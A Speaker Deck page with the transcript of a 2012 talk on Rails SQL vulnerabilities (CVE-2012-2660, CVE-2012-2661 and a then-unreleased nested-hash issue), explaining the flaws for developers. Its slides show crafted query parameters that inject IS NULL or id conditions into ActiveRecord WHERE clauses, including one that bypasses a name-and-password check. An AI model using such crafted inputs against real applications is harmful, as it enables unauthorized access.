Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
67
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
140
The Evolution of Rails Security
presidentbeef
1
800
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
140
Practical Static Analysis for Continuous Application Security
presidentbeef
0
200
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
430
Continuous Security with Practical Static Analysis
presidentbeef
1
300
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
230
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
230
Other Decks in Programming
See All in Programming
ニーリーにおけるプロダクトエンジニア
nealle
0
710
プロダクト志向ってなんなんだろうね
righttouch
PRO
0
170
ruby.wasmで多人数リアルタイム通信ゲームを作ろう
lnit
2
330
A2A プロトコルを試してみる
azukiazusa1
2
1.3k
生成AIコーディングとの向き合い方、AIと共創するという考え方 / How to deal with generative AI coding and the concept of co-creating with AI
seike460
PRO
1
350
GoのGenericsによるslice操作との付き合い方
syumai
3
710
datadog dash 2025 LLM observability for reliability and stability
ivry_presentationmaterials
0
400
Google Agent Development Kit でLINE Botを作ってみた
ymd65536
2
210
Composerが「依存解決」のためにどんな工夫をしているか #phpcon
o0h
PRO
1
250
#kanrk08 / 公開版 PicoRubyとマイコンでの自作トレーニング計測装置を用いたワークアウトの理想と現実
bash0c7
1
660
Is Xcode slowly dying out in 2025?
uetyo
1
240
システム成長を止めない!本番無停止テーブル移行の全貌
sakawe_ee
1
150
Featured
See All Featured
Optimising Largest Contentful Paint
csswizardry
37
3.3k
Making the Leap to Tech Lead
cromwellryan
134
9.4k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
17
950
The MySQL Ecosystem @ GitHub 2015
samlambert
251
13k
The Straight Up "How To Draw Better" Workshop
denniskardys
234
140k
How to Think Like a Performance Engineer
csswizardry
24
1.7k
Into the Great Unknown - MozCon
thekraken
39
1.9k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.3k
Documentation Writing (for coders)
carmenintech
72
4.9k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
130
19k
The Cost Of JavaScript in 2023
addyosmani
51
8.5k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
281
13k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1